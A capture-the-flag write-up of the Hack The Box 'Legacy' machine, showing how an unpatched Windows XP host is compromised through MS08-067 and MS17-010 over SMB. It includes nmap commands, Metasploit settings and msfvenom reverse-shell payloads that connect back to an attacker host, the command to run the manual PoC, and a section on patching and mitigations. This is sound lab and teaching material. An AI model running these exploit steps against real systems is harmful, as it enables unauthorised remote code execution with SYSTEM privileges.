- OS: Windows XP SP3
- Domain / vhosts: LEGACY (workgroup HTB)
Summary
Legacy is a Windows XP SP3 machine exposing SMB on ports 139 and 445 with no
patches applied. Both MS08-067 (CVE-2008-4250) and MS17-010 (CVE-2017-0143)
are present and confirmed by nmap scripts. Either exploit lands NT AUTHORITY\SYSTEM
immediately, because on XP the Server service runs in the SYSTEM context. There is
no separate user-to-root step — the single shell reads both flags.
The primary path used was Metasploit’s ms08_067_netapi. The module auto-fingerprinted
the target as “Windows XP SP3 English (AlwaysOn NX)” and handled the NX bypass via a
ROP chain, opening a cmd.exe reverse shell in under 10 seconds.
Recon
Parallel quick scan (top 100 ports + scripts) and full port scan:
nmap -sV -sC --top-ports 100 -oA nmap-quick <TARGET>
nmap -p- --min-rate 1000 -oA nmap-full <TARGET>
Quick scan output (relevant ports):
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY
| Workgroup: HTB
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Full scan confirmed nothing else — only 135, 139, 445 open.
Two signals matter here: the OS banner says “Windows XP” and SMB2 negotiation failed outright. SMB2 was introduced in Vista; XP speaks only SMB1. These two facts together narrow the likely vulnerability class to MS08-067 and MS17-010 before touching a single script.
Vuln script confirmation:
nmap --script smb-vuln-* -p 135,139,445 -oA nmap-vuln <TARGET>
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
Both confirmed. MS08-067 is the more reliable path on XP — it uses a simpler overflow primitive with no kernel pool grooming — so that is what the primary run used.
Foothold
MS08-067 via Metasploit
MS08-067 is a pre-authentication stack overflow in the NetPathCanonicalize RPC call
exposed by the Server service over the \PIPE\BROWSER named pipe. The pipe accepts
anonymous IPC$ connections, so no credentials are required. The overflow happens inside
the path-canonicalization routine, before any authentication check is reached.
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET>
set LHOST <ATTACKER>
set LPORT 4443
set PAYLOAD windows/shell_reverse_tcp
exploit
MSF auto-detects the exact target variant from the SMB OS banner and selects the appropriate return address or ROP chain. In this run it identified “Windows XP SP3 English (AlwaysOn NX)” and handled the NX bypass via ROP gadgets in a loaded DLL at a fixed base address (ASLR does not exist on XP):
[*] <TARGET>:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] <TARGET>:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] <TARGET>:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (<ATTACKER>:4443 -> <TARGET>:1033)
The shell opens as NT AUTHORITY\SYSTEM. No privilege escalation step exists — the
Server service on XP runs as SYSTEM, so the exploit context is already the highest
privilege level on the host.
User flag
Both flags are accessible from the single SYSTEM shell. The XP-era user home path
is C:\Documents and Settings\<username>\Desktop\ (Vista+ changed this to
C:\Users\):
C:\Documents and Settings\john\Desktop\user.txt
Privilege escalation
Not applicable. The MS08-067 exploit fires in the context of the Server service, which
runs as NT AUTHORITY\SYSTEM on Windows XP. Initial code execution is already the
highest privilege on the machine.
C:\Documents and Settings\Administrator\Desktop\root.txt
Manual MS08-067 path (for learning)
The public Python PoC (ExploitDB 7132, later modified versions on GitHub) takes a shellcode blob and a target index number. The bad-char list for the RPC packet is:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
These bytes break the path-canonicalization parser before the overflow fires. Generate shellcode avoiding them:
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=443 \
-b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' \
-f python -v shellcode EXITFUNC=thread
EXITFUNC=thread matters — it prevents the SMB service from crashing when the shell
exits, which would block retries.
Target index 6 = “Windows XP SP3 English (NX)”, index 7 = “Windows XP SP3 English (AlwaysOn NX)”. Paste the generated shellcode into the PoC, start a listener, then:
python2 ms08_067.py <TARGET> 6
Note: the public PoCs are Python 2. They use legacy impacket imports
(impacket.dcerpc instead of impacket.dcerpc.v5). Either install an old impacket
version in a venv or patch the import paths.
Alternative — MS17-010 EternalBlue
The target is also vulnerable to EternalBlue. Metasploit module
exploit/windows/smb/ms17_010_eternalblue works. EternalBlue is slightly less
reliable on XP due to kernel pool grooming sensitivity — if the first attempt fails,
retry. Both paths reach the same SYSTEM shell.
Why each step worked
Pre-auth RCE (MS08-067): The NetPathCanonicalize RPC call is reachable via the
\PIPE\BROWSER named pipe, which accepts anonymous IPC$ connections. The path
canonicalization routine overflows a stack buffer before performing any authentication.
No credentials needed.
No ASLR on XP: Module base addresses are static. The ROP chain used to disable the NX (Data Execution Prevention) page attribute relies on gadgets at fixed offsets inside a loaded DLL. On any modern OS these addresses would be randomised, making a fixed-offset chain useless.
SYSTEM shell from SMB: srv.sys and the Server service that backs SMB on Windows
XP run under NT AUTHORITY\SYSTEM. Any code injected via the Server service inherits
that context — no separate escalation step is needed.
Counterfactuals
- Apply MS08-067 (patched October 2008). Apply MS17-010 (patched March 2017).
- Disable SMBv1 (
Set-SmbServerConfiguration -EnableSMB1Protocol $false). No modern client requires it. - Block ports 139 and 445 at the network perimeter. SMB is not an internet-facing protocol.
- Upgrade from end-of-life Windows XP (EOL April 2014). Ongoing patch coverage alone would have prevented both CVEs.
Cleanup
No files were written to the target. The windows/shell_reverse_tcp payload executes
entirely in memory from the injected shellcode; no dropper, stager binary, or
persistence mechanism was installed. Terminating the shell session left the target in
its pre-engagement state.
Key Takeaways
- “Windows XP + SMB1 + ports 139/445” is a complete vulnerability disclosure. Fingerprint → CVE lookup → exploit is the entire chain; no enumeration beyond nmap is required.
- The Metasploit auto-targeting for MS08-067 correctly identifies NX variants and applies the appropriate ROP chain. Understanding what it does — stack overflow → ROP gadgets to disable NX → shellcode exec — is the skill that transfers to targets without a ready-made module.
- On Windows XP, any SMB RCE is a direct SYSTEM shell. Both flags live in the same session; there is no escalation step.
- Always run
smb-vuln-ms08-067andsmb-vuln-ms17-010together when SMB1 is present. Finding both positive on the same host is common on early HTB Windows boxes. EXITFUNC=threadin msfvenom shellcode prevents the SMB service from crashing on shell exit, preserving the ability to re-exploit if needed.
References
- Microsoft Security Bulletin MS08-067 (October 2008)
- Microsoft Security Bulletin MS17-010 (March 2017)
- 0xdf, “HTB: Legacy” — https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
- IppSec, “Legacy” — https://ippsec.rocks/?#Legacy
- worawit/MS17-010 PoC — https://github.com/worawit/MS17-010